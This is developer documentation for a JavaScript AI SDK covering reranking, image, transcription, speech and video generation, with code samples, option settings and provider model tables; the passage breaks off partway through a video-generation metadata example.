import { cohere } from '@ai-sdk/cohere';
const documents = [
{
from: 'Paul Doe',
subject: 'Follow-up',
text: 'We are happy to give you a discount of 20% on your next order.',
},
{
from: 'John McGill',
subject: 'Missing Info',
text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
},
];
const { ranking, rerankedDocuments } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'Which pricing did we get from Oracle?',
topN: 1,
});
console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }
Understanding the Results
The rerank function returns a comprehensive result object:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking, rerankedDocuments, originalDocuments } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
});
// ranking: sorted array of { originalIndex, score, document }
// rerankedDocuments: documents sorted by relevance (convenience property)
// originalDocuments: original documents array
Each item in the ranking array contains:
- originalIndex: Position in the original documents array
- score: Relevance score (typically 0-1, where higher is more relevant)
- document: The original document
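For example, to keep only results above a relevance threshold (the 0.5 cutoff is arbitrary):
const relevant = ranking.filter(item => item.score > 0.5);
console.log(relevant.map(item => item.document));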
Settings
Top-N Results
Use topN to limit the number of results returned. This is useful for retrieving only the most relevant documents:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['doc1', 'doc2', 'doc3', 'doc4', 'doc5'],
query: 'relevant information',
topN: 3, // Return only top 3 most relevant documents
});
Provider Options
Reranking model settings can be configured using providerOptions for provider-specific parameters:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
cohere: {
maxTokensPerDoc: 1000, // Limit tokens per document
},
},
});
Retries
The rerank function accepts an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the reranking process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
The rerank function accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the reranking process or set a timeout.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});
Custom Headers
The rerank function accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the reranking request.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
headers: { 'X-Custom-Header': 'custom-value' },
});
Response Information
The rerank function returns response information that includes the raw provider response:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking, response } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
});
console.log(response); // { id, timestamp, modelId, headers, body }
Reranking Providers & Models
Several providers offer reranking models:
| Provider | Model |
|---|---|
| Cohere | rerank-v3.5 |
| Cohere | rerank-english-v3.0 |
| Cohere | rerank-multilingual-v3.0 |
| Amazon Bedrock | amazon.rerank-v1:0 |
| Amazon Bedrock | cohere.rerank-v3-5:0 |
| Together.ai | Salesforce/Llama-Rank-v1 |
| Together.ai | mixedbread-ai/Mxbai-Rerank-Large-V2 |
title: Image Generation description: Learn how to generate images with the AI SDK.
Image Generation
The AI SDK provides the generateImage
function to generate images based on a given prompt using an image model.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
});
You can access the image data using the base64 or uint8Array properties:
const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data
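For example, to save the image to disk in Node.js (a minimal sketch; the filename is arbitrary):
import { writeFile } from 'fs/promises';
await writeFile('image.png', image.uint8Array); // writeFile accepts Uint8Array data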
Settings
Size and Aspect Ratio
Depending on the model, you can either specify the size or the aspect ratio.
Size
The size is specified as a string in the format {width}x{height}.
Models only support a few sizes, and the supported sizes are different for each model and provider.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
});
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
aspectRatio: '16:9',
});
Generating Multiple Images
generateImage also supports generating multiple images at once:
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { images } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
n: 4, // number of images to generate
});
Each image model has an internal limit on how many images it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple images using the n parameter. By default, the SDK uses provider-documented limits (for example, DALL-E 3 can only generate 1 image per call, while DALL-E 2 supports up to 10).
If needed, you can override this behavior using the maxImagesPerCall setting when generating your image. This is particularly useful when working with new or custom models where the default batch size might not be optimal:
const { images } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
maxImagesPerCall: 5, // Override the default batch size
n: 10, // Will make 2 calls of 5 images each
});
Providing a Seed
You can provide a seed to the generateImage function to control the output of the image generation process.
If supported by the model, the same seed will always produce the same image.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
seed: 1234567890,
});
Provider-specific Settings
Image models often have provider- or even model-specific settings.
You can pass such settings to the generateImage function
using the providerOptions parameter. The options for the provider
(openai in the example below) become request body properties.
import { generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
providerOptions: {
openai: { style: 'vivid', quality: 'hd' },
},
});
Abort Signals and Timeouts
generateImage accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the image generation process or set a timeout.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateImage accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the image generation request.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { image, warnings } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
});
Additional Provider-specific Metadata
Some providers expose additional metadata for the result overall or per image.
const prompt = 'Santa Claus driving a Cadillac';
const { image, providerMetadata } = await generateImage({
model: openai.image('dall-e-3'),
prompt,
});
const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;
console.log({
prompt,
revisedPrompt,
});
The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. An images key is always present in the metadata and is an array with the same length as the top level images key.
Error Handling
When generateImage cannot generate a valid image, it throws an AI_NoImageGeneratedError.
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Image Middleware
You can enhance image models, e.g. to set default values or implement logging, using
wrapImageModel and ImageModelV3Middleware.
Here is an example that sets a default size when none is provided:
import { generateImage, wrapImageModel } from 'ai';
__PROVIDER_IMPORT__;
const model = wrapImageModel({
model: __IMAGE_MODEL__,
middleware: {
specificationVersion: 'v3',
transformParams: async ({ params }) => ({
...params,
size: params.size ?? '1024x1024',
}),
},
});
const { image } = await generateImage({
model,
prompt: 'Santa Claus driving a Cadillac',
});
Generating Images with Language Models
Some language models such as Google gemini-2.5-flash-image support multi-modal outputs including images.
With such models, you can access the generated images using the files property of the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image'),
prompt: 'Generate an image of a comic cat',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
// The file object provides multiple data formats:
// Access images as base64 string, Uint8Array binary data, or check type
// - file.base64: string (data URL format)
// - file.uint8Array: Uint8Array (binary data)
// - file.mediaType: string (e.g. "image/png")
}
}
Image Models
| Provider | Model | Supported sizes (width x height) or aspect ratios (width : height) |
|---|---|---|
| xAI Grok | grok-imagine-image | 1:1, 16:9, 9:16, 4:3, 3:4, 3:2, 2:3, 2:1, 1:2, 19.5:9, 9:19.5, 20:9, 9:20, auto |
| OpenAI | gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| OpenAI | dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| OpenAI | dall-e-2 | 256x256, 512x512, 1024x1024 |
| Amazon Bedrock | amazon.nova-canvas-v1:0 | 320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels |
| Fal | fal-ai/flux/dev | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-lora | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/fast-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-pro/v1.1-ultra | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/ideogram/v2 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/recraft-v3 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/stable-diffusion-3.5-large | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/hyper-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| DeepInfra | stabilityai/sd3.5 | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | black-forest-labs/FLUX-1.1-pro | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-schnell | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-1-dev | 256-1440 (multiples of 32) |
| DeepInfra | black-forest-labs/FLUX-pro | 256-1440 (multiples of 32) |
| DeepInfra | stabilityai/sd3.5-medium | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| DeepInfra | stabilityai/sdxl-turbo | 1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21 |
| Replicate | black-forest-labs/flux-schnell | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Replicate | recraft-ai/recraft-v3 | 1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024 |
| Google Generative AI | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Generative AI | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Google Vertex | imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| Fireworks | accounts/fireworks/models/flux-1-dev-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/flux-1-schnell-fp8 | 1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9 |
| Fireworks | accounts/fireworks/models/playground-v2-5-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/japanese-stable-diffusion-xl | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/playground-v2-1024px-aesthetic | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/SSD-1B | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Fireworks | accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | 640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640 |
| Luma | photon-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Luma | photon-flash-1 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Together.ai | stabilityai/stable-diffusion-xl-base-1.0 | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-dev-lora | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-canny | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-depth | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-redux | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-pro | 512x512, 768x768, 1024x1024 |
| Together.ai | black-forest-labs/FLUX.1-schnell-Free | 512x512, 768x768, 1024x1024 |
| Black Forest Labs | flux-kontext-pro | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-kontext-max | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1-ultra | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.1 | From 3:7 (portrait) to 7:3 (landscape) |
| Black Forest Labs | flux-pro-1.0-fill | From 3:7 (portrait) to 7:3 (landscape) |
Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Transcription description: Learn how to transcribe audio with the AI SDK.
Transcription
Transcription is an experimental feature.
The AI SDK provides the transcribe
function to transcribe audio using a transcription model.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.
To access the generated transcript:
const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available
Settings
Provider-specific Settings
Transcription models often have provider- or model-specific settings, which you can set using the providerOptions parameter.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
timestampGranularities: ['word'],
},
},
});
Download Size Limits
When audio is a URL, the SDK downloads the file with a default 2 GiB size limit.
You can customize this using createDownload:
import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});
You can also provide a fully custom download function:
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
download: async ({ url }) => {
const res = await myAuthenticatedFetch(url);
return {
data: new Uint8Array(await res.arrayBuffer()),
mediaType: res.headers.get('content-type') ?? undefined,
};
},
});
If a download exceeds the size limit, a DownloadError is thrown:
import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
});
} catch (error) {
if (DownloadError.isInstance(error)) {
console.log('Download failed:', error.message);
}
}
Abort Signals and Timeouts
transcribe accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the transcription process or set a timeout.
This is particularly useful when combined with URL downloads to prevent long-running requests:
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: new URL('https://example.com/audio.mp3'),
abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});
Custom Headers
transcribe accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the transcription request.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';
const transcript = await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
const warnings = transcript.warnings;
Error Handling
When transcribe cannot generate a valid transcript, it throws an AI_NoTranscriptGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the transcription model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_transcribe as transcribe,
NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';
try {
await transcribe({
model: openai.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
});
} catch (error) {
if (NoTranscriptGeneratedError.isInstance(error)) {
console.log('NoTranscriptGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Transcription Models
| Provider | Model |
|---|---|
| OpenAI | whisper-1 |
| OpenAI | gpt-4o-transcribe |
| OpenAI | gpt-4o-mini-transcribe |
| ElevenLabs | scribe_v1 |
| ElevenLabs | scribe_v1_experimental |
| Groq | whisper-large-v3-turbo |
| Groq | whisper-large-v3 |
| Azure OpenAI | whisper-1 |
| Azure OpenAI | gpt-4o-transcribe |
| Azure OpenAI | gpt-4o-mini-transcribe |
| Rev.ai | machine |
| Rev.ai | low_cost |
| Rev.ai | fusion |
| Deepgram | base (+ variants) |
| Deepgram | enhanced (+ variants) |
| Deepgram | nova (+ variants) |
| Deepgram | nova-2 (+ variants) |
| Deepgram | nova-3 (+ variants) |
| Gladia | default |
| AssemblyAI | best |
| AssemblyAI | nano |
| Fal | whisper |
| Fal | wizper |
Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Speech description: Learn how to generate speech from text with the AI SDK.
Speech
Speech is an experimental feature.
The AI SDK provides the generateSpeech
function to generate speech from text using a speech model.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
});
Language Setting
You can specify the language for speech generation (provider support varies):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const audio = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hola, mundo!',
language: 'es', // Spanish
});
To access the generated audio:
const audioData = audio.audio.uint8Array; // audio data as Uint8Array
// or
const audioBase64 = audio.audio.base64; // audio data as base64 string
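For example, to save the generated audio to disk in Node.js (a minimal sketch; the file extension depends on the output format you requested):
import { writeFile } from 'fs/promises';
await writeFile('speech.mp3', audio.audio.uint8Array);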
Settings
Provider-specific Settings
You can set model-specific settings with the providerOptions parameter.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
providerOptions: {
openai: {
// ...
},
},
});
Abort Signals and Timeouts
generateSpeech accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the speech generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateSpeech accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the speech generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
Warnings (e.g. unsupported parameters) are available on the warnings property.
import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const audio = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
const warnings = audio.warnings;
Error Handling
When generateSpeech cannot generate valid audio, it throws an AI_NoSpeechGeneratedError.
This error can arise for any of the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the speech model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import {
experimental_generateSpeech as generateSpeech,
NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
try {
await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
});
} catch (error) {
if (NoSpeechGeneratedError.isInstance(error)) {
console.log('NoSpeechGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Speech Models
| Provider | Model |
|---|---|
| OpenAI | tts-1 |
| OpenAI | tts-1-hd |
| OpenAI | gpt-4o-mini-tts |
| ElevenLabs | eleven_v3 |
| ElevenLabs | eleven_multilingual_v2 |
| ElevenLabs | eleven_flash_v2_5 |
| ElevenLabs | eleven_flash_v2 |
| ElevenLabs | eleven_turbo_v2_5 |
| ElevenLabs | eleven_turbo_v2 |
| LMNT | aurora |
| LMNT | blizzard |
| Hume | default |
Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.
title: Video Generation description: Learn how to generate videos with the AI SDK.
Video Generation
The AI SDK provides the experimental_generateVideo
function to generate videos based on a given prompt using a video model.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
});
You can access the video data using the base64 or uint8Array properties:
const base64 = video.base64; // base64 video data
const uint8Array = video.uint8Array; // Uint8Array video data
Settings
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
aspectRatio: '16:9',
});
Resolution
The resolution is specified as a string in the format {width}x{height}.
Models only support specific resolutions, and the supported resolutions are different for each model and provider.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A serene mountain landscape at sunset',
resolution: '1280x720',
});
Duration
Some video models support specifying the duration of the generated video in seconds.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A timelapse of clouds moving across the sky',
duration: 5,
});
Frames Per Second (FPS)
Some video models allow you to specify the frames per second for the generated video.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A hummingbird in slow motion',
fps: 24,
});
Generating Multiple Videos
experimental_generateVideo supports generating multiple videos at once:
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { videos } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
n: 3, // number of videos to generate
});
Each video model has an internal limit on how many videos it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple videos using the n parameter. Most video models only support generating 1 video per call due to computational cost.
If needed, you can override this behavior using the maxVideosPerCall setting:
const { videos } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
maxVideosPerCall: 2, // Override the default batch size
n: 4, // Will make 2 calls of 2 videos each
});
Image-to-Video Generation
Some video models support generating videos from an input image. You can provide an image using the prompt object:
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: {
image: 'https://example.com/my-image.png',
text: 'Animate this image with gentle motion',
},
});
You can also provide the image as a base64-encoded string or Uint8Array:
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: {
image: imageBase64String, // or imageUint8Array
text: 'Animate this image',
},
});
Providing a Seed
You can provide a seed to the experimental_generateVideo function to control the output of the video generation process.
If supported by the model, the same seed will always produce the same video.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
seed: 1234567890,
});
Provider-specific Settings
Video models often have provider- or even model-specific settings.
You can pass such settings to the experimental_generateVideo function
using the providerOptions parameter. The options for the provider
become request body properties.
import { experimental_generateVideo as generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';
const { video } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt: 'A cat walking on a treadmill',
aspectRatio: '16:9',
providerOptions: {
fal: { loop: true, motionStrength: 0.8 },
},
});
Abort Signals and Timeouts
experimental_generateVideo accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the video generation process or set a timeout.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
abortSignal: AbortSignal.timeout(60000), // Abort after 60 seconds
});
Polling Timeout
Video generation is an asynchronous process that can take several minutes to complete. Most providers use a polling mechanism where the SDK periodically checks if the video is ready. The default polling timeout is typically 5 minutes, which may not be sufficient for longer videos or certain models.
You can configure the polling timeout using provider-specific options. Each provider exports a type for its options that you can use with satisfies for type safety:
import { experimental_generateVideo as generateVideo } from 'ai';
import { fal, type FalVideoModelOptions } from '@ai-sdk/fal';
const { video } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt: 'A cinematic timelapse of a city from dawn to dusk',
duration: 10,
providerOptions: {
fal: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies FalVideoModelOptions,
},
});
Custom Headers
experimental_generateVideo accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the video generation request.
import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;
const { video } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { video, warnings } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A cat walking on a treadmill',
});
Additional Provider-specific Metadata
Some providers expose additional metadata for the result overall or per video.
const prompt = 'A cat walking on a treadmill';
const { video, providerMetadata } = await generateVideo({
model: fal.video('luma-dream-machine/ray-2'),
prompt,
});
// Access provider-specific metadata
const videoMetadata = providerMetadata.fal?.videos[0];
console.log({
duration: videoMetadata?.duration,
fps: videoMetadata?.fps,
width: videoMetadata?.width,
height: videoMetadata?.height,
});
The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. A videos key is typically present in the metadata and is an array with the same length as the top level videos key.
When generating multiple videos with n > 1, you can also access per-call metadata through the responses array:
const { videos, responses } = await generateVideo({
model: __VIDEO_MODEL__,
prompt: 'A rocket launching into space',
n: 5, // May require multiple API calls
});
// Access metadata from each individual API call
for (const response of responses) {
console.log({
